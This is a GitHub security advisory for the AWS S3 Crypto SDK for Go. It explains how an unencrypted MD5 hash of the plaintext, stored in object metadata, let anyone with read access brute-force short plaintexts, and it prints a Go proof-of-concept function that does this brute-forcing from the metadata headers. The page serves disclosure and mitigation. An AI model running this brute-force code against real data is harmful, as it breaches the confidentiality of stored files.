GHSA-76wf-9vgp-pj7w

Suggest an improvement
Source
https://github.com/advisories/GHSA-76wf-9vgp-pj7w
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/02/GHSA-76wf-9vgp-pj7w/GHSA-76wf-9vgp-pj7w.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-76wf-9vgp-pj7w
Aliases
Related
Published
2022-02-11T23:26:12Z
Modified
2023-11-08T04:08:48.393637Z
Summary
Unencrypted md5 plaintext hash in metadata in AWS S3 Crypto SDK for golang
Details

Summary

The golang AWS S3 Crypto SDK was impacted by an issue that can result in loss of confidentiality. An attacker with read access to an encrypted S3 bucket was able to recover the plaintext without accessing the encryption key.

Specific Go Packages Affected

github.com/aws/aws-sdk-go/service/s3/s3crypto

Risk/Severity

The vulnerability poses insider risks/privilege escalation risks, circumventing KMS controls for stored data.

Impact

The issue has been fully mitigated by AWS as of Aug. 5th by disallowing the header in question.

The S3 crypto library tries to store an unencrypted hash of the plaintext alongside the ciphertext as a metadata field. This hash can be used to brute force the plaintext in an offline attack, if the hash is readable to the attacker. In order to be impacted by this issue, the attacker has to be able to guess the plaintext as a whole. The attack is theoretically valid if the plaintext entropy is below the key size, i.e. if it is easier to brute force the plaintext instead of the key itself, but practically feasible only for short plaintexts or plaintexts otherwise accessible to the attacker in order to create a rainbow table.

The issue has been fixed server-side by AWS as of Aug 5th, by blocking the related metadata field. No S3 objects are affected anymore.

Mitigation

The header in question is no longer served by AWS, making this attack fully mitigated as of Aug. 5th.

Proof of concept

A Proof of concept is available in a separate github repository, this particular issue can be found at here:

func HashExploit(bucket string, key string, input *OfflineAttackInput) (string, error) {
    _, header, err := input.S3Mock.GetObjectDirect(bucket, key)
    length, err := strconv.Atoi(header.Get("X-Amz-Meta-X-Amz-Unencrypted-Content-Length"))
    plaintextMd5 := header.Get("X-Amz-Meta-X-Amz-Unencrypted-Content-Md5")
    blocks := length / 16
    possiblePlaintextNum := 1
    segNum := len(input.PossiblePlaintextSegments)
    for i := 0; i < blocks; i++ {
        possiblePlaintextNum *= segNum
    }
    for i := 0; i < possiblePlaintextNum; i++ {
        w := i
        guess := ""
        for j := 0; j < blocks; j++ {
            guess += input.PossiblePlaintextSegments[w%segNum]
            w /= segNum
        }
        guessMd5 := md5.Sum([]byte(guess))
        if plaintextMd5 == base64.StdEncoding.EncodeToString(guessMd5[:]) {
            return guess, nil
        }
    }
    return "", fmt.Errorf("No plaintext found!")
}

The PoC will only work on old versions of the library, as the hash has been removed from being calculated as well.

References

Affected packages

Go / github.com/aws/aws-sdk-go

Package

Name
github.com/aws/aws-sdk-go
View open source insights on deps.dev
Purl
pkg:golang/github.com/aws/aws-sdk-go

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
1.34.0